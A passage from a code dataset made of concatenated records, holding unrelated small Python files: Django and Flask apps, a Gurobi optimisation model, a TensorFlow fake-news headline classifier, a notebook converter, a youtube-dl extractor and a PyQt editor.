140))\r\n draw.text((475, 105), name, fill=(83, 78, 95, 255), font=font)\r\n draw.text((500, 235), level, fill=(83, 78, 95, 255), font=font)\r\n draw.text((780, 235), rank, fill=(83, 78, 95, 255), font=font)\r\n draw.text((475, 355), exp, fill=(83, 78, 95, 255), font=font)\r\n final1 = Image.new(\"RGBA\", sample_image.size)\r\n final1.paste(sample_image, (0, 0), sample_image)\r\n final1.paste(sample_image2, (0, 0), sample_image2)\r\n final2 = Image.new(\"RGBA\", sample_image.size)\r\n final2 = Image.alpha_composite(final2, sample_image)\r\n final2 = Image.alpha_composite(final2, sample_image2)\r\n final2.save(name + \".png\")\r\n\r\n\r\nasync def peopl():\r\n f = open(\"Last update\", 'r')\r\n t = time.time()\r\n tim = f.read()\r\n f.close()\r\n if t > int(tim) + 3600:\r\n f = open(\"Last update\", 'w')\r\n f.write(str(t))\r\n f.close()\r\n","sub_path":"accounty.py","file_name":"accounty.py","file_ext":"py","file_size_in_byte":6500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"624363896","text":"from django.conf.urls import patterns, include, url\r\nfrom django.conf import settings\r\nfrom django.contrib import admin\r\n\r\nadmin.autodiscover()\r\n\r\nurlpatterns = patterns('',\r\n url(r'^media/(?P.*)$', 'django.views.static.serve', { 'document_root': settings.MEDIA_ROOT, }),\r\n url(r'^static/(?P.*)$', 'django.views.static.serve', { 'document_root': settings.STATIC_ROOT, }), \r\n url(r'^admin/', include(admin.site.urls)),\r\n \r\n url(r'^$', 'colorama.views.index'),\r\n url(r'^portfolio$', 'colorama.views.portfolio'),\r\n url(r'^project/(?P\\d+)/$', 'colorama.views.project'),\r\n url(r'^about$', 'colorama.views.about'),\r\n url(r'^blog$', 'colorama.views.blog'),\r\n url(r'^contact$', 'colorama.views.contact'),\r\n)","sub_path":"web/web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"473858644","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 8 16:16:28 2021\r\n@author: natma\r\n\"\"\"\r\nfrom gurobipy import *\r\nimport numpy as np\r\n\r\nN=10#Needy people to be served\r\n\r\ndef Ufairshare(n0,n1,n2,n3,d1,d2,d3):\r\n \r\n L=150#demand curve\r\n f=np.zeros(4)#freshness\r\n p=np.array([1,0.75,0.50,0.25])#Price\r\n cost=max(0.25,0.5-L*0.001)#cost\r\n profit=0\r\n fine=0.05\r\n #proportion of needed served by farshare\r\n n = np.array([n0,n1,n2,n3])\r\n\r\n cum_n=0\r\n cum_R=0\r\n #terms in fairshare penalty equation\r\n term_3=0\r\n fareshare_penalty=0\r\n \r\n #Supermarket Utility\r\n Waste=0\r\n Profit=0\r\n Benefit_Fairshare=0\r\n \r\n\r\n for i in range(4):\r\n f[i]=(4-i)/4\r\n term_3+=(n[i]*(1.0-f[i]))\r\n R_pure=L*(f[i]/2.5)\r\n sigmoid=(L/5)*np.tanh(p[i]-0.5)\r\n cum_n=n[i]+cum_n\r\n# R=min(R_pure-sigmoid,L-cum_n-cum_R)\r\n R=L-cum_n-cum_R\r\n cum_R=R+cum_R\r\n waste=L-cum_R-cum_n\r\n profit+=(p[i]*R)\r\n \r\n ###########################\r\n expand_1=N*N\r\n expand_2=cum_n*cum_n\r\n ##############################\r\n expand_3=2*N*cum_n\r\n #################################\r\n# expand_5=expand_1+expand_2-expand_4\r\n expand_5=expand_1+expand_2-expand_3\r\n expand_6=d2/expand_1\r\n \r\n ##############################################\r\n term_2=expand_5*expand_6\r\n term_3=d3*term_3\r\n fareshare_penalty=term_2+term_3\r\n \r\n Waste=fine*waste\r\n Profit=profit-(cost*L)\r\n \r\n Benefit_Fairshare= (d1*N)-(fareshare_penalty)\r\n Total=Profit-(Waste)+Benefit_Fairshare\r\n return Total\r\n\r\n\r\ndef main():\r\n \r\n milp_model = Model(\"milp\")\r\n \r\n for d2 in range (1,11):\r\n d1 = milp_model.addVar(vtype=GRB.INTEGER,lb=1,name=\"d1\")\r\n d3 = milp_model.addVar(vtype=GRB.INTEGER,lb=1,name=\"d3\")\r\n n0 = milp_model.addVar(vtype=GRB.INTEGER,lb=0,name=\"n0\")\r\n n1 = milp_model.addVar(vtype=GRB.INTEGER,lb=0,name=\"n1\")\r\n n2 = milp_model.addVar(vtype=GRB.INTEGER,lb=0,name=\"n2\")\r\n n3 = milp_model.addVar(vtype=GRB.INTEGER,lb=0,name=\"n3\")\r\n obj_fun = Ufairshare(n0,n1,n2,n3,d1,d2,d3)\r\n milp_model.setObjective(obj_fun,GRB.MAXIMIZE)\r\n \r\n c1 = milp_model.addConstr(n0+n1+n2+n3<=N,\"c1\")\r\n c2 = milp_model.addConstr(d1+d2+d3<=30,\"c2\")\r\n c3 = milp_model.addConstr(d1<=10,\"c3\")\r\n c5 = milp_model.addConstr(d3<=10,\"c5\")\r\n\r\n \r\n# milp_model.params.NonConvex = 2\r\n milp_model.optimize()\r\n \r\n print('Objective Function Value:%.2f' %milp_model.objVal)\r\n #get values\r\n for v in milp_model.getVars():\r\n print('%s:%g'%(v.varName,v.x))\r\n\r\n\r\n \r\nif __name__== \"__main__\":\r\n main()\r\n","sub_path":"fare_share optimisation.py","file_name":"fare_share optimisation.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"414931269","text":"from django.shortcuts import render, redirect, reverse, get_object_or_404\nfrom .models import scents, products\n\n\ndef all_products(request):\n \"\"\" A view to show the list of products \"\"\"\n\n product = products.objects.all()\n\n context = {\n \n 'product': product,\n }\n\n return render(request, 'product/products.html', context)\n\n\ndef product_detail(request, products_id):\n \"\"\" A view to show individual product details \"\"\"\n\n product_det = get_object_or_404(products, pk=products_id)\n scent = scents.objects.all()\n\n context = {\n 'product_det': product_det,\n 'scent': scent,\n }\n\n return render(request, 'product/product_detail.html', context)\n\n","sub_path":"product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"534242137","text":"from flask import Flask\nfrom flask import redirect\nfrom flask.ext.script import Manager\n\n\napp = Flask(__name__)\nmanager = Manager(app)\n\n@app.route('/')\ndef index():\n\treturn redirect('http://www.google.com')\n\n@app.route('/user/')\ndef get_user(id):\n\tuser = load_user(id)\n\tif not user:\n\t\tabort(404)\n\treturn '

    Hello, %s!

    ' % user.name\n\n\nif __name__ == '__main__':\n\tmanager.run()\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"476508258","text":"from django.conf import settings\nfrom django.http import HttpResponse\nfrom django.template.base import TemplateDoesNotExist\nfrom tornado import template\n\n\ndef render_string(template_name, **kwargs):\n \"\"\"Generate the given template with the given arguments.\n\n We return the generated string. To generate and write a template\n as a response, use render() above.\n \"\"\"\n template_path = settings.TEMPLATE_DIRS[0]\n if template_path:\n loader = template.Loader(template_path)\n try:\n t = loader.load(template_name)\n except:\n raise\n return t.generate(**kwargs)\n else:\n error_msg = \"TEMPLATE_DIRS is not set in settings\"\n raise TemplateDoesNotExist(error_msg)\n\n\ndef render_response(template_name, **kwargs):\n # http_response_kwargs = {'mimetype': kwargs.pop('mimetype', None)}\n return HttpResponse(render_string(template_name, **kwargs))\n","sub_path":"django/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"72037753","text":"from BVDataset import BVDataset\nfrom torch import nn, optim\nimport torch\nimport os\nimport sys\nimport numpy as np\nfrom torchvision.utils import save_image\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nimport torch.distributions.multivariate_normal as mn\nfrom model.BAGAN.encoder import Encoder\nfrom model.BAGAN.decoder import Decoder\n\n\ndef reparameterization(mu, logvar):\n std = logvar.mul(0.5).exp_()\n eps = Variable(std.data.new(std.size()).normal_())\n z = eps.mul(std).add_(mu)\n return z\n\ndef batch2one(Z, y, z, class_num):\n for i in range(y.shape[0]):\n Z[y[i]] = torch.cat((Z[y[i]], z[i].cpu()), dim=0) # Z[label][0] should be deleted..\n return Z\n\n\ncuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if cuda else \"cpu\")\nkwargs = {'num_workers': 1, 'pin_memory': True} if cuda else {}\nseed = 1\nin_channels = 3\nz_dim = 16\nimg_dim = 256\nlatent_size = 100\nlog_interval = 50\nmodel_save_path = \"/home/kdd/Documents/GAN/model/BAGAN/ave_checkpoints/\"\nz_dim = 16\nclass_num = 2\n\n\n\ntrain_root = '/home/kdd/Documents/GAN/data/torch_dataloader/train'\n\ndata_transforms = transforms.Compose([\n # tv.transforms.RandomCrop((64, 64), padding=4),\n transforms.Resize((img_dim,img_dim)),\n transforms.ToTensor(),\n])\n\ntrain_loader = torch.utils.data.DataLoader(\n datasets.ImageFolder(train_root, transform=data_transforms),\n batch_size = 150, shuffle=True, **kwargs)\n\n\n\nencoder = Encoder(in_channels, z_dim, latent_size, img_dim)\ndecoder = Decoder(latent_size, img_dim, z_dim)\n\nif torch.cuda.device_count() > 1:\n # model = nn.DataParallel(model)\n encoder = nn.DataParallel(encoder)\n decoder = nn.DataParallel(decoder)\n\n# model = model.to(device)\nencoder = encoder.to(device)\ndecoder = decoder.to(device)\n\n\nfor file in os.listdir(model_save_path):\n \n if file.startswith(\"encoder\") and file.endswith(\".tar\"):\n checkpointE = torch.load(model_save_path + file, map_location='cpu')\n encoder.module.load_state_dict(checkpointE['encoder_state_dict'])\n encoder.to(device)\n\n if file.startswith(\"decoder\") and file.endswith(\".tar\"):\n checkpointD = torch.load(model_save_path + file, map_location='cpu')\n decoder.module.load_state_dict(checkpointD['decoder_state_dict'])\n decoder.to(device)\n\nencoder.eval()\ndecoder.eval()\nZ = list()\ncovariances = list()\nmeans = list()\n\nn = 0\n\nwith torch.no_grad():\n for i in range(class_num):\n Z.append(torch.zeros((1, latent_size), dtype=torch.float))\n\n for i, (img, label) in enumerate(train_loader):\n img = img.to(device)\n latent_feature = encoder(img)\n n += 1\n # print(\"1 \",latent_feature.size())\n # print(n)\n latent_feature = latent_feature.view(-1, 1, latent_size)\n # print(\"2 \",latent_feature.size())\n Z = batch2one(Z, label, latent_feature, class_num)\n\n for i in range(class_num):\n label_mean = torch.mean(Z[i][1:], dim=0).double()\n label_cov = torch.from_numpy(np.cov(Z[i][1:].numpy(), rowvar=False)).double()\n means.append(label_mean)\n covariances.append(label_cov)\n\n # print(len(covariances),covariances[0].size())\n torch.save({\n 'means': means,\n 'covariances': covariances\n }, model_save_path + \"class_distribution.dt\")","sub_path":"get_distribution.py","file_name":"get_distribution.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"295106679","text":"import unittest\n\n\ndef factorize(x):\n \"\"\"\n Factorize positive integer and return its factors.\n :type x: int,>=0\n :rtype: tuple[N],N>0\n \"\"\"\n pass\n\n\nclass TestFactorize(unittest.TestCase):\n def test_wrong_types_raise_exception(self):\n self.cases = ('string', 1.5)\n for x in self.cases:\n with self.subTest(case=x):\n self.assertRaises(TypeError, factorize, x)\n\n def test_negative(self):\n self.cases = (-1, -10, -100)\n for x in self.cases:\n with self.subTest(case=x):\n self.assertRaises(ValueError, factorize, x)\n\n def test_zero_and_one_cases(self):\n self.cases = (0, 1)\n for x in self.cases:\n with self.subTest(case=x):\n a = factorize(x)\n self.assertEqual(a, (x,))\n\n def test_simple_numbers(self):\n self.cases = (3, 13, 29)\n for x in self.cases:\n with self.subTest(case=x):\n a = factorize(x)\n self.assertEqual(a, (x,))\n\n def test_two_simple_multipliers(self):\n self.cases = (6, 26, 121)\n self.cases2 = ((2, 3), (2, 13), (11, 11))\n for i, x in enumerate(self.cases):\n with self.subTest(case=x):\n a = factorize(x)\n self.assertIsInstance(a, tuple)\n self.assertEqual(len(a), 2)\n self.assertEqual(a, self.cases2[i])\n\n def test_many_multipliers(self):\n self.cases = (1001, 9699690)\n self.cases2 = ((7, 11, 13), (2, 3, 5, 7, 11, 13, 17, 19))\n for i, x in enumerate(self.cases):\n with self.subTest(case=x):\n a = factorize(x)\n self.assertIsInstance(a, tuple)\n self.assertGreater(len(a), 2)\n self.assertEqual(a, self.cases2[i])\n\n\nif True:\n unittest.main()\n","sub_path":"TestFactorize.py","file_name":"TestFactorize.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"75961269","text":"#!/usr/bin/env python3\n# Copyright (C) 2018 Frank Seifferth\n# SPDX-License-Identifier: GPL-3.0+\n\"\"\"Convert between jupyter notebook and pure python code\"\"\"\n\nimport sys, os, json, re\n\n\ndef ipynb_to_py(doc: str) -> str:\n \"\"\"Convert ipynb to pure python\"\"\"\n ipynb = json.loads(doc)\n py = [\"#!/usr/bin/env python3\"]\n for cell in ipynb[\"cells\"]:\n py.append(\"\\n\\n\")\n if cell[\"cell_type\"] == \"code\":\n py.append(\"### code cell ###\\n\")\n py += cell[\"source\"]\n else:\n py.append(\"### {} cell ###\\n\".format(cell[\"cell_type\"]))\n for line in cell[\"source\"]:\n py.append(\"# \"+line)\n return \"\".join(py)\n\n\ndef py_to_ipynb(doc: str) -> str:\n \"\"\"Convert pure python to ipynb\"\"\"\n def new_ipynb():\n return { \"cells\": [],\n \"metadata\": {\n 'kernelspec': {\n 'display_name': 'Python 3',\n 'language': 'python',\n 'name': 'python3' },\n 'language_info': {\n 'codemirror_mode': {\n 'name': 'ipython',\n 'version': 3 },\n 'file_extension': '.py',\n 'mimetype': 'text/x-python',\n 'name': 'python',\n 'nbconvert_exporter': 'python',\n 'pygments_lexer': 'ipython3',\n 'version': '3.7.1' } },\n \"nbformat\": 4, \"nbformat_minor\": 2 }\n\n def new_cell(celltype):\n if celltype == \"code\":\n return { \"cell_type\": \"code\",\n \"execution_count\": None,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [] }\n else:\n return { \"cell_type\": celltype,\n \"metadata\": {},\n \"source\": [] }\n\n def remove_trailing_newlines(cells):\n try:\n source = cells[-1][\"source\"]\n while source[-1].strip() == \"\":\n del source[-1]\n if source[-1][-1] == \"\\n\":\n source[-1] = source[-1][:-1]\n except IndexError:\n pass\n\n def is_empty(line):\n return line == \"\" or re.match(\"^# *$\", line)\n\n def implicit_codecell(line):\n if celltype == \"code\":\n return False\n l_0 = line.strip()[:1]\n if l_0 and l_0 != \"#\":\n return True\n return False\n\n py = doc.splitlines()\n ipynb = new_ipynb()\n cells = ipynb[\"cells\"]\n # Remove shebang line (if any) and initial newlines\n if py[0].startswith(\"#!\"):\n del py[0]\n if is_empty(py[0]):\n del py[0]\n # Process all cells\n celltype = \"code\"\n regex_newcell = re.compile(\"^ *###+ *([a-z]+) +cell *###+ *$\")\n for line in py:\n if regex_newcell.match(line):\n remove_trailing_newlines(cells)\n celltype = regex_newcell.match(line).groups()[0]\n cells.append(new_cell(celltype))\n elif implicit_codecell(line):\n remove_trailing_newlines(cells)\n celltype = \"code\"\n cells.append(new_cell(\"code\"))\n cells[-1][\"source\"].append(line+\"\\n\")\n elif cells and not cells[-1][\"source\"] and is_empty(line):\n pass # Remove initial newlines\n else:\n if not cells: # Handle python code before cell specification\n cells.append(new_cell(celltype))\n if celltype == \"code\":\n cells[-1][\"source\"].append(line+\"\\n\")\n else:\n cells[-1][\"source\"].append(re.sub(\"^# ?\", \"\", line+\"\\n\"))\n remove_trailing_newlines(cells)\n return json.dumps(ipynb, indent=1)\n\n\nif __name__ == \"__main__\":\n usage = \"Usage: unpyter \"\n\n if len(sys.argv) != 2:\n print(usage, file=sys.stderr)\n exit(1)\n\n if sys.argv[1] in [\"-h\", \"--help\"]:\n print(usage)\n exit(0)\n elif os.path.isfile(sys.argv[1]):\n with open(sys.argv[1]) as f:\n doc = f.read()\n if sys.argv[1].endswith(\".ipynb\"):\n print(ipynb_to_py(doc))\n elif sys.argv[1].endswith(\".py\"):\n print(py_to_ipynb(doc))\n else:\n print(\"Filename extension not recognized. Supported\\n\"\n \"extensions are '.py' or '.ipynb'.\", file=sys.stderr)\n exit(1)\n else:\n print(usage, file=sys.stderr)\n exit(1)\n","sub_path":"unpyter.py","file_name":"unpyter.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"205207283","text":"#Determine if an article is fake news or not\r\n#practice on my own\r\n#data from kaggle\r\nimport os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' #disables tf telling me i have wrong gpu\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nsentences = pd.read_csv('TorF.csv').title\r\nlabels = pd.read_csv('TorF.csv').label\r\n\r\nvocab_size = 10000\r\nembedding_dim = 16\r\nmax_length = 100\r\ntrunc_type='post'\r\npadding_type='post'\r\noov_tok = \"\"\r\ntraining_size = 10000\r\n\r\n#Defining our data\r\n#trying to make an even split between true and false headlines\r\ntraining_sentences1 = sentences[:training_size]\r\ntraining_sentences2 = sentences[2*training_size:]\r\ntraining_sentences = pd.concat([training_sentences1,training_sentences2])\r\n\r\ntesting_sentences = sentences[training_size:2*training_size]\r\n\r\ntraining_labels1 = labels[:training_size]\r\ntraining_labels2 = labels[2*training_size:]\r\ntraining_labels = pd.concat([training_labels1,training_labels2])\r\n\r\ntesting_labels = labels[training_size:2*training_size]\r\n\r\n#doing the previous work of tokenizing each sentence\r\nfrom tensorflow.keras.preprocessing.text import Tokenizer\r\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\r\n\r\ntokenizer = Tokenizer(num_words = vocab_size ,oov_token = oov_tok)\r\ntokenizer.fit_on_texts(training_sentences)\r\n\r\nword_index = tokenizer.word_index\r\n\r\n\r\n#putting sentences into sequences and then padding them to be equal length\r\ntraining_sequences = tokenizer.texts_to_sequences(training_sentences)\r\ntraining_padded = pad_sequences(training_sequences, padding = padding_type, maxlen = max_length, truncating = trunc_type)\r\n\r\ntesting_sequences = tokenizer.texts_to_sequences(testing_sentences)\r\ntesting_padded = pad_sequences(testing_sequences, padding = padding_type, maxlen = max_length, truncating = trunc_type)\r\n\r\n#need to put so it runs properly\r\nimport numpy as np\r\ntraining_padded = np.array(training_padded)\r\ntraining_labels = np.array(training_labels)\r\ntesting_padded = np.array(testing_padded)\r\ntesting_labels = np.array(testing_labels)\r\n\r\n#define the model\r\nmodel = tf.keras.Sequential([\r\n\t\ttf.keras.layers.Embedding(vocab_size, embedding_dim, input_length = max_length),\r\n\t\ttf.keras.layers.GlobalAveragePooling1D(),\r\n\t\ttf.keras.layers.Dense(24, activation = 'relu'),\r\n\t\ttf.keras.layers.Dense(1,activation = 'sigmoid')\r\n\t])\r\nmodel.compile(loss = 'binary_crossentropy', optimizer ='adam', metrics = ['accuracy'])\r\n\r\nnum_epochs = 5\r\n\r\nhistory = model.fit(training_padded, training_labels, epochs = num_epochs, validation_data = (testing_padded, testing_labels), verbose = 2)\r\n\r\n\r\n\r\nsentence = [\"Republican leaders claim new yorkers will greet us millitary as liberators\"]\r\n\r\nsequences = tokenizer.texts_to_sequences(sentence)\r\n\r\npadded = pad_sequences(sequences,maxlen = max_length, padding=padding_type, truncating=trunc_type)\r\n\r\nprint(model.predict(padded))","sub_path":"Machine Learning/Deep Learning Series/DeepLearning3.py","file_name":"DeepLearning3.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"128017429","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nCreated on 11/27/20 4:13 PM\n@Author : Justin Jiang\n@Email : jw_jiang@pku.edu.com\n\"\"\"\n\n\ndef countCharacters(words, chars):\n def check(record, current):\n for key in current:\n if key not in record:\n return False\n if record.get(key) < current.get(key):\n return False\n return True\n\n record = dict()\n result = 0\n for char in chars:\n if char not in record:\n record.setdefault(char, 1)\n else:\n record[char] += 1\n for word in words:\n current = dict()\n for ch in word:\n if ch not in current:\n current.setdefault(ch, 1)\n else:\n current[ch] += 1\n if check(record, current):\n result += len(word)\n return result\n\n\nif __name__ == '__main__':\n words = [\"cat\", \"bt\", \"hat\", \"tree\"]\n chars = \"atach\"\n print(countCharacters(words, chars))\n","sub_path":"20201029/1160_countCharacters.py","file_name":"1160_countCharacters.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"517246551","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nfrom .common import InfoExtractor\n\nfrom .brightcove import BrightcoveNewIE\n\nimport re\n\nclass ManchesterEveningNewsIE(InfoExtractor):\n _VALID_URL = r'https?://(?:www\\.)?manchestereveningnews.co.uk/news/'\n _TEST = {\n 'url': 'https://www.manchestereveningnews.co.uk/news/greater-manchester-news/moment-mcflys-danny-jones-surprises-16247191',\n 'md5': 'd1f4229ce36196f8a8818f74e781d34d',\n 'info_dict': {\n 'id': '16247191',\n 'ext': 'mp4',\n 'title': \"Moment McFly's Danny Jones surprises Pride of Manchester award winner on stage\",\n 'description' : ' Emma Harris was delighted at seeing McFly star Danny Jones on stage to present her with a Pride of Manchester award '\n }\n }\n\n def _real_extract(self, url):\n video_id = url.rsplit('-', 1)[-1]\n webpage = self._download_webpage(url, video_id)\n brightcove_url = re.findall('', webpage)\n title = re.findall('', webpage)\n description = re.findall('', webpage)\n\n return {\n 'title': title[0],\n 'url': brightcove_url[0],\n 'id': video_id,\n 'description': description[0]\n }","sub_path":"youtube_dl/extractor/manchestereveningnews.py","file_name":"manchestereveningnews.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"45302758","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtGui, QtCore\nfrom Queries import Queries\n\nclass EditCompounds(QtGui.QWidget):\n\tdef __init__(self):\n\t\tsuper(EditCompounds, self).__init__()\n\t\t# functions\n\t\tself.getCompoundsMatrix()\n\t\tself.initUI()\n\tdef getCompoundsMatrix(self):\n\t\tcolumns_list = {\"id,singular,plural,environments\"}\n\t\tquery_list = {\n\t\t\t\"database\" : \"nlp\",\n\t\t\t\"query_type\" : \"SELECT\",\n\t\t\t\"table\" : \"compounds\",\n\t\t\t\"columns_list\" : columns_list,\n\t\t\t\"id\" : \"*\"\n\t\t}\n\t\tqueries_obj = Queries(query_list)\n\t\tresult = queries_obj.returnResult()\n\t\t# create compounds matrix\n\t\tself.compounds_matrix = []\n\t\tfor compound_tupel in result:\n\t\t\tenvironments_list = compound_tupel[3].split(\",\")\n\t\t\tself.compounds_matrix.append({\"id\" : str(compound_tupel[0]),\"singular\" : compound_tupel[1],\"plural\" : compound_tupel[2],\"environments\" : compound_tupel[3]})\n\t\t# order alphabetically \n\t\tself.compounds_matrix = sorted(self.compounds_matrix, key=lambda i: i['singular'].lower()) \t\n\tdef initUI(self):\n\t\t# grid\n\t\tgrid = QtGui.QGridLayout()\n\t\tgrid.setAlignment(QtCore.Qt.AlignTop)\n\t\t# spacer\n\t\tgrid.setRowMinimumHeight(0,10)\n\t\t# new \n\t\tbutton = QtGui.QPushButton('&new compound', self)\n\t\tsubmit_dict = {\"mode\" : \"new\",\"id\" : \"\"}\n\t\tbutton.pressed.connect(lambda arg = submit_dict : self.clickListButton(arg))\n\t\tgrid.addWidget(button,1,0)\n\t\t# spacer\n\t\tgrid.setRowMinimumHeight(2,30)\n\t\t# advice\n\t\tif len(self.compounds_matrix) == 0:\t\t\t\n\t\t\tlabel_str = QtCore.QString(\"No compounds in database.\")\n\t\t\tlabel = QtGui.QLabel(label_str)\n\t\t\tlabel.setStyleSheet('color: red')\n\t\t\tlabel.setFixedWidth(400)\n\t\t\tgrid.addWidget(label,3,0)\n\t\t# list compounds matrix\n\t\tcount = 3\n\t\tstart = count - 1 \n\t\tfor compound_list in self.compounds_matrix:\n\t\t\t# font \n\t\t\tfont = QtGui.QFont()\n\t\t\tfont.setPointSize(10)\n\t\t\t# singular\n\t\t\tlabel_str = QtCore.QString(compound_list[\"singular\"])\n\t\t\tlabel = QtGui.QLabel(label_str)\n\t\t\tlabel.setFont(font)\n\t\t\tlabel.setFixedWidth(400)\n\t\t\tgrid.addWidget(label,count,0)\n\t\t\t# plural\n\t\t\tlabel_str = QtCore.QString(compound_list[\"plural\"])\n\t\t\tlabel = QtGui.QLabel(label_str)\n\t\t\tlabel.setFont(font)\n\t\t\tlabel.setFixedWidth(400)\n\t\t\tgrid.addWidget(label,count,1)\n\t\t\t# edit \n\t\t\tbutton = QtGui.QPushButton('edit', self)\n\t\t\tbutton.setFont(font)\n\t\t\tbutton.setFixedWidth(100)\n\t\t\tbutton.setFixedHeight(22)\n\t\t\tsubmit_dict = {\"mode\" : \"edit\",\"id\" : compound_list[\"id\"]}\n\t\t\tbutton.pressed.connect(lambda arg = submit_dict : self.clickListButton(arg))\n\t\t\tgrid.addWidget(button,count,2)\t\n\t\t\t# delete \n\t\t\tbutton = QtGui.QPushButton('delete', self)\n\t\t\tbutton.setFont(font)\n\t\t\tbutton.setFixedWidth(100)\n\t\t\tbutton.setFixedHeight(22)\n\t\t\tsubmit_dict = {\"mode\" : \"delete\",\"id\" : compound_list[\"id\"]}\n\t\t\tbutton.pressed.connect(lambda arg = submit_dict : self.clickListButton(arg))\n\t\t\tgrid.addWidget(button,count,3)\t\n\t\t\t# count\n\t\t\tcount += 1\n\t\t# set layout\n\t\tself.setLayout(grid)\n\tdef clickListButton(self,submit_dict):\n\t\t# get index\n\t\tname_indexer = dict((p[\"id\"], i) for i, p in enumerate(self.compounds_matrix))\n\t\tindex = name_indexer.get(submit_dict[\"id\"], -1)\n\t\t# get submit type and number\t\t\n\t\tif submit_dict[\"mode\"] == \"new\":\t\t\t\n\t\t\tsingular = \"\"\n\t\t\tplural = \"\"\n\t\t\tenvironments = \"global\"\n\t\t\tself.openNewEditDialog(submit_dict,singular,plural,environments)\n\t\tif submit_dict[\"mode\"] == \"edit\":\t\t\t\n\t\t\tsingular = self.compounds_matrix[index][\"singular\"]\n\t\t\tplural = self.compounds_matrix[index][\"plural\"]\n\t\t\tenvironments = self.compounds_matrix[index][\"environments\"]\n\t\t\tself.openNewEditDialog(submit_dict,singular,plural,environments)\n\t\tif submit_dict[\"mode\"] == \"delete\":\t\t\t\n\t\t\tsingular = self.compounds_matrix[index][\"singular\"]\n\t\t\tplural = self.compounds_matrix[index][\"plural\"]\n\t\t\tenvironments = self.compounds_matrix[index][\"environments\"]\n\t\t\tself.openDeleteDialog(submit_dict,singular,plural,environments)\n\tdef openNewEditDialog(self,submit_dict,singular,plural,environments):\n\t\t# dialog\n\t\tself.dialog = QtGui.QDialog(self)\n\t\ttitle = \"%s compound\" % submit_dict[\"mode\"]\n\t\tself.dialog.setWindowTitle(title)\n\t\t# layout\n\t\tself.dialog.setLayout(QtGui.QFormLayout())\n\t\tscreen = QtGui.QDesktopWidget().availableGeometry()\n\t\tself.dialog.setGeometry(screen.width()/2-420,screen.height()/2-300, 840,300)\n\t\tself.dialog.layout().setVerticalSpacing(10)\n\t\t# singular\n\t\tlabel_str = QtCore.QString(\"singular\")\n\t\tlabel = QtGui.QLabel(label_str)\n\t\tself.dialog.layout().addRow(label)\n\t\tself.singular_edit = QtGui.QLineEdit()\n\t\tself.singular_edit.setText(singular)\n\t\tself.singular_edit.setFixedWidth(800)\n\t\tself.dialog.layout().addRow(self.singular_edit)\n\t\t# plural\n\t\tlabel_str = QtCore.QString(\"plural\")\n\t\tlabel = QtGui.QLabel(label_str)\n\t\tself.dialog.layout().addRow(label)\n\t\tself.plural_edit = QtGui.QLineEdit()\n\t\tself.plural_edit.setText(plural)\n\t\tself.plural_edit.setFixedWidth(800)\n\t\tself.dialog.layout().addRow(self.plural_edit)\n\t\t# environments\n\t\tlabel_str = QtCore.QString(\"environments\")\n\t\tlabel = QtGui.QLabel(label_str)\n\t\tself.dialog.layout().addRow(label)\n\t\tself.environments_edit = QtGui.QLineEdit()\n\t\tself.environments_edit.setText(environments)\n\t\tself.environments_edit.setFixedWidth(800)\n\t\tself.dialog.layout().addRow(self.environments_edit)\n\t\t# spacer \n\t\tspacerItem = QtGui.QSpacerItem(1, 20)\n\t\tself.dialog.layout().addItem(spacerItem)\n\t\t# ok \n\t\tbutton = QtGui.QPushButton(\"ok\",self)\n\t\tbutton.setFixedWidth(300)\n\t\tbutton.pressed.connect(lambda arg = submit_dict : self.clickDialogButton(arg))\n\t\tself.dialog.layout().addRow(button)\n\t\t# modal \n\t\tself.dialog.exec_()\n\tdef openDeleteDialog(self,submit_dict,singular,plural,environments):\n\t\t# dialog\n\t\tself.dialog = QtGui.QDialog(self)\n\t\ttitle = \"%s compound\" % submit_dict[\"mode\"]\n\t\tself.dialog.setWindowTitle(title)\n\t\t# layout\n\t\tself.dialog.setLayout(QtGui.QFormLayout())\n\t\tscreen = QtGui.QDesktopWidget().availableGeometry()\n\t\tself.dialog.setGeometry(screen.width()/2-300,screen.height()/2-150,600,150)\n\t\tself.dialog.layout().setVerticalSpacing(10)\n\t\t# spacer \n\t\tspacerItem = QtGui.QSpacerItem(1,20)\n\t\tself.dialog.layout().addItem(spacerItem)\n\t\t# singular\n\t\tlabel_str = 